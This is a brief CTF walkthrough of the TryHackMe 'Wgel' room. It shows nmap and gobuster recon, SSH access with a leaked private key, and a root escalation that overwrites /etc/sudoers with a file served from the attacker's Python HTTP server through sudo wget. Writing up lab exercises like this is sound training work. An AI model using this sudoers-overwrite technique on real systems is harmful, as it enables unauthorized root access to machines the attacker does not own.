Walkthrough - Wgel CTF

Posted Jul 22, 2022 Updated Mar 17, 2023

By 0xskar

1 min read

Exfiltrate the root flag

https://tryhackme.com/room/wgelctf

Discovery

nmap -F -A -T4 10.10.247.33 -vvv
gobuster dir -u http://10.10.247.33/sitemap -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,cgi –no-error -t 100
we find a username to use with the id_rsa in the source code of the apache welcome page

User flag

cat user_flag.txt

Root flag

create sudoers file on attacker

  
#jessie  ALL=(root) NOPASSWD: /usr/bin/wget
jessie  ALL=(ALL) NOPASSWD: ALL

python3 -m http.server 80
on target machine travel to /etc and wget sudoers file
sudo su
cat /root/root_flag.txt

This post is licensed under CC BY 4.0 by the author.

Recently Updated

Trending Tags

TryHackMe linux nmap Enumeration web CTF hydra Linux security THM

Contents

Trending Tags

TryHackMe linux nmap Enumeration web CTF hydra Linux security THM

A new version of content is available.